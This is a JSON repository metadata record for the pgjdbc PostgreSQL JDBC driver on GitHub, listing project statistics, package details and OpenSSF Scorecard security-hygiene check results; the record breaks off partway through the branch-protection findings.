{"id":362778,"url":"https://github.com/pgjdbc/pgjdbc","last_synced_at":"2026-06-20T09:30:15.060Z","repository":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-06-18T14:47:25.000Z","size":48512,"stargazers_count":1720,"open_issues_count":627,"forks_count":930,"subscribers_count":78,"default_branch":"master","last_synced_at":"2026-06-19T04:25:05.138Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-06-18T14:48:14.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"3f4ac789-9a1d-4707-8473-760c8cd0eab5","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":257,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34523990,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-19T02:00:06.005Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"packages":[{"id":4968296,"name":"org.postgresql:pgjdbc-benchmark","ecosystem":"maven","description":"PostgreSQL JDBC Driver - benchmarks","homepage":"https://github.com/pgjdbc/pgjdbc","licenses":"The PostgreSQL License","normalized_licenses":["PostgreSQL"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":"org.postgresql","versions_count":15,"first_release_published_at":"2015-12-22T20:23:39.000Z","latest_release_published_at":"2018-03-15T16:17:20.000Z","latest_release_number":"42.2.2","last_synced_at":"2026-06-17T08:00:37.214Z","created_at":"2022-07-27T08:03:22.904Z","updated_at":"2026-06-17T08:00:37.214Z","registry_url":"https://central.sonatype.com/artifact/org.postgresql/pgjdbc-benchmark/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.postgresql/pgjdbc-benchmark/","metadata":{"distribution_repositories":["https://oss.sonatype.org/service/local/staging/deploy/maven2","https://oss.sonatype.org/content/repositories/snapshots"]},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-03-14T19:19:55.000Z","size":46673,"stargazers_count":1696,"open_issues_count":622,"forks_count":924,"subscribers_count":79,"default_branch":"master","last_synced_at":"2026-03-15T03:08:24.429Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-03-14T19:19:58.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"86f905c6-23fb-401f-ba06-fc529694e76e","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":256,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 